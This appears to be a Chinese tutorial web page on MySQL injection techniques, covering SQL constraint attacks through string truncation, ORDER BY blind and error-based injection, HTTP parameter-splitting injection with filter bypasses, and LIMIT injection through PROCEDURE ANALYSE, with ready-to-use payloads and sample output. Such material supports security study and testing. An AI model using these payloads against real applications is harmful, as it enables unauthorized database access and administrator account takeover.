mysql注入之長(zhǎng)字符截?cái)?orderby注入,HTTP分割注入,limit注入方式
長(zhǎng)字符截?cái)?SQL約束攻擊
產(chǎn)生原因:在mysql中的一個(gè)設(shè)置里有一個(gè)sql_mode選項(xiàng),當(dāng)sql_mode設(shè)置為default時(shí),即沒(méi)有開啟STRICT_ALL_TABLES選項(xiàng)時(shí)(MySQL默認(rèn) sql_mode為default),MySQL對(duì)插入超長(zhǎng)的值只會(huì)提示warning,而不是error,這樣就會(huì)導(dǎo)致一些截?cái)鄦?wèn)題。
例如:
一個(gè)表的username字段類型為varchar(7) 長(zhǎng)度最多7個(gè)字符。
那么我們插入的時(shí)候?qū)⒆址岣叩?字符以上,它只取前7位,并且會(huì)彈出warning。
利用漏洞:
假設(shè)管理員的登錄名為admin,那么我們可以注冊(cè)一個(gè)“admin ”后面有八個(gè)空格用戶即可輕易進(jìn)入后臺(tái)管理界面。
order by rand(True) /order by rand(False)盲注
產(chǎn)生原因:原語(yǔ)句類似為$id=$_GET['sort']; select * from users order by $id ;
利用漏洞:
- 報(bào)錯(cuò)注入?sort=1 and updatexml(1,if(1=1,concat(0x7e,version()),2),1)
- 盲注 order by rand(True)和order by rand(False)的結(jié)果排序是不同的,可以根據(jù)這個(gè)不同來(lái)進(jìn)行盲注。
例如:
- 布爾盲注:?sort= rand(database()='ujcms')
- 返回了True的排序,說(shuō)明database()='ujcms'是正確的值
- 時(shí)間盲注 ?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))
- 執(zhí)行結(jié)果睡眠2秒
HTTP分割注入
場(chǎng)景:
參數(shù)為username&password,查詢語(yǔ)句為
select xxx from xxx where username='xxx' and password ='xxx';
但是username參數(shù)過(guò)濾了注釋符,無(wú)法將后面的注釋掉,則可嘗試用內(nèi)聯(lián)注釋把password注釋掉,湊成一條新語(yǔ)句后注釋或閉合掉后面的語(yǔ)句:
當(dāng)然這種注入的前提是單引號(hào)沒(méi)有被過(guò)濾
payload:username=1' or extractvalue /*'&password=1*/ (1,concat(0x7e,(select database()),0x7e))) or'
則查詢語(yǔ)句為
select * from users where username='1' or extractvalue /*' and password='1*/ (1,concat(0x7e,(select database()),0x7e)) or'';
過(guò)濾了空格,union,#,—+,/*,^,or,|
可以考慮將password作為函數(shù)的參數(shù)來(lái)閉合語(yǔ)句:
payload:username=admin' and(strcmp(&password=,'asdasdasdasdasdasd')) and '1
則查詢語(yǔ)句為
select * from users where username='admin' and(strcmp(' and password=','asdasdasdasdasdasd')) and '1';
strcmp比較,二者不一致返回True,一致返回False,而MySQL會(huì)將’1’判斷為數(shù)字1,即True,因此該查詢語(yǔ)句結(jié)果為True
limit注入
一般實(shí)際過(guò)程中使用 limit 時(shí),大概有兩種情況,一種使用order by,一種就是不使用 order by關(guān)鍵字
不存在 order by 關(guān)鍵字
- 執(zhí)行語(yǔ)句 select id from users limit 0,1;
- 這種情況下的 limit 后面可以使用union進(jìn)行聯(lián)合查詢注入
- 執(zhí)行語(yǔ)句 select id from users limit 0,1 union select username from users;
存在 order by 關(guān)鍵字
此方法適用于5.0.0< MySQL <5.6.6版本,在limit語(yǔ)句后面的注入
limit 關(guān)鍵字后面還可跟PROCEDURE和 INTO兩個(gè)關(guān)鍵字,但是 INTO 后面寫入文件需要知道絕對(duì)路徑以及寫入shell的權(quán)限,因此利用比較難,因此這里以PROCEDURE為例進(jìn)行注入
使用 PROCEDURE函數(shù)進(jìn)行注入,ANALYSE支持兩個(gè)參數(shù),首先嘗試一下默認(rèn)兩個(gè)參數(shù)
mysql> select id from users order by id desc limit 0,1 procedure analyse(1,1); ERROR 1386 (HY000): Can't use ORDER clause with this procedure
報(bào)錯(cuò),嘗試一下對(duì)其中一個(gè)參數(shù)進(jìn)行注入,這里首先嘗試報(bào)錯(cuò)注入
mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.53'
不存在回顯怎么辦,延遲注入呀,如果 select version(); 第一個(gè)為5,則多次執(zhí)行sha(1)達(dá)到延遲效果,這里不支持使用 sleep,所以需要使用BENCHMARK進(jìn)行替代
mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1)))),1);
ERROR 1105 (HY000): XPATH syntax error: ':0'
總結(jié)
以上為個(gè)人經(jīng)驗(yàn),希望能給大家一個(gè)參考,也希望大家多多支持腳本之家。
相關(guān)文章
MySQL導(dǎo)入導(dǎo)出助手類庫(kù)MysqlHelper安裝使用
這篇文章主要為大家介紹了MySQL導(dǎo)入導(dǎo)出助手類庫(kù)MysqlHelper安裝使用詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2023-09-09Mysql 出現(xiàn)故障應(yīng)用直接中斷連接導(dǎo)致數(shù)據(jù)被鎖(生產(chǎn)故障)詳解
這篇文章主要介紹了 Mysql 出現(xiàn)故障應(yīng)用直接中斷連接導(dǎo)致數(shù)據(jù)被鎖(生產(chǎn)故障)詳解的相關(guān)資料,需要的朋友可以參考下2017-01-01MySQL性能優(yōu)化之table_cache配置參數(shù)淺析
這篇文章主要介紹了MySQL性能優(yōu)化之table_cache配置參數(shù)淺析,本文介紹了它的緩存機(jī)制、參數(shù)優(yōu)化及清空緩存的命令等,需要的朋友可以參考下2014-07-07關(guān)于Mysql中文亂碼問(wèn)題該如何解決(亂碼問(wèn)題完美解決方案)
這篇文章給大家介紹關(guān)于Mysql中文亂碼問(wèn)題該如何解決(亂碼問(wèn)題完美解決方案)的相關(guān)資料,還給大家收集些關(guān)于MySQL會(huì)出現(xiàn)中文亂碼原因常見的幾點(diǎn),小伙伴快來(lái)看看吧2015-11-11MySQL忽略表名大小寫的2種方法實(shí)現(xiàn)
在 MySQL 中,默認(rèn)情況下表名是大小寫敏感的,本文主要介紹了MySQL忽略表名大小寫的2種方法實(shí)現(xiàn),具有一定的參考價(jià)值,感興趣的可以了解一下2024-03-03mysqladmin、mysqlshow、mysqlcheck的工具使用
我們一般使用mysql客戶端工具來(lái)進(jìn)行日常的數(shù)據(jù)庫(kù)操作,本文主要介紹了mysqladmin、mysqlshow、mysqlcheck的工具使用,具有一定的參考價(jià)值,感興趣的可以了解一下2024-07-07MySQL數(shù)據(jù)庫(kù)性能優(yōu)化介紹
大家好,本篇文章主要講的是MySQL數(shù)據(jù)庫(kù)性能優(yōu)化介紹,感興趣的同學(xué)趕快來(lái)看一看吧,對(duì)你有幫助的話記得收藏一下,方便下次瀏覽2021-12-12